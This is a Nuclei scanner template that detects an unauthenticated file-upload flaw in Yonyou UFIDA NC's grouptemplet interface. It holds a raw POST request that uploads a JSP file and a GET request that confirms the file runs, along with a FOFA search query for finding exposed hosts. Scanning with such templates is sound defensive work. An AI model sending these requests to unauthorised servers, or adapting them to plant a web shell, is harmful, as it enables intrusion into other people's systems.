nuclei-templates/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-file...

46 lines
1.6 KiB
YAML
Raw Permalink Normal View History

2023-09-15 12:23:57 +00:00
id: yonyou-nc-grouptemplet-fileupload
2023-08-18 03:22:06 +00:00
info:
2023-09-15 12:23:57 +00:00
name: UFIDA NC Grouptemplet Interface - Unauthenticated File Upload
2023-08-18 03:22:06 +00:00
author: SleepingBag945
severity: critical
2023-09-15 12:23:57 +00:00
description: |
The UFIDA NC Grouptemplet Interface permits unauthenticated users to upload potentially malicious files.
2023-08-18 03:22:06 +00:00
reference:
- https://www.seebug.org/vuldb/ssvid-99547
2023-09-15 12:23:57 +00:00
- https://github.com/Augensternyu/POC-bomber/blob/main/pocs/redteam/yongyou_nc_fileupload_2022.py
metadata:
2023-10-14 11:27:55 +00:00
verified: true
2023-09-17 16:11:07 +00:00
max-request: 2
2023-09-15 12:23:57 +00:00
fofa-query: app="用友-UFIDA-NC
2023-09-17 08:51:38 +00:00
tags: yonyou,intrusive,ufida,fileupload
2023-08-18 03:22:06 +00:00
variables:
v1: "{{rand_int(1,100)}}"
http:
- raw:
- |
POST /uapim/upload/grouptemplet?groupid={{v1}}&fileType=jsp HTTP/1.1
Host: {{Hostname}}
Content-type: multipart/form-data; boundary=----------Ef1KM7GI3Ef1ei4Ij5ae0KM7cH2KM7
------------Ef1KM7GI3Ef1ei4Ij5ae0KM7cH2KM7
Content-Disposition: form-data; name="upload"; filename="{{randstr_1}}.jsp"
Content-Type: application/octet-stream
<%out.println("{{randstr_2}}");%>
------------Ef1KM7GI3Ef1ei4Ij5ae0KM7cH2KM7--
- |
GET /uapim/static/pages/{{v1}}/head.jsp HTTP/1.1
Host: {{Hostname}}
2023-09-15 12:23:57 +00:00
2023-08-18 03:22:06 +00:00
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code_1 == 200"
- "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')"
2023-10-14 11:27:55 +00:00
condition: and
# digest: 4a0a0047304502202c766a3202a46060a829d4b89895ae36490c268ec1e79e7ccd4ef68904687d2d022100ad6cdfb33e6377226c2903589eac7542d06e8be63c8e077a8471ab59ad1a8f25:922c64590222798bb761d5b6d8e72950